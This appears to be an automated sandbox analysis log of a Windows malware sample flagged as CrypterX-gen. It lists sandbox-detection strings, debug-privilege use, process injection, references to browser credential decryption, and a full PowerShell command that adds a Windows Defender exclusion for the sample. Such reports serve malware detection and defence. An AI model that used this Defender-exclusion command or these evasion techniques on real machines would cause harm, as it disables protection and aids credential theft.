Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598797 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598687 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598577 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598140 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597922 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597812 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597703 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597593 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597046 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596390 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596276 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596172 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595843 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 594968 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 594859 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 594750 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 594640 Jump to behavior
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1736065029.0000000000F72000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1736065029.0000000000F72000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169872577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
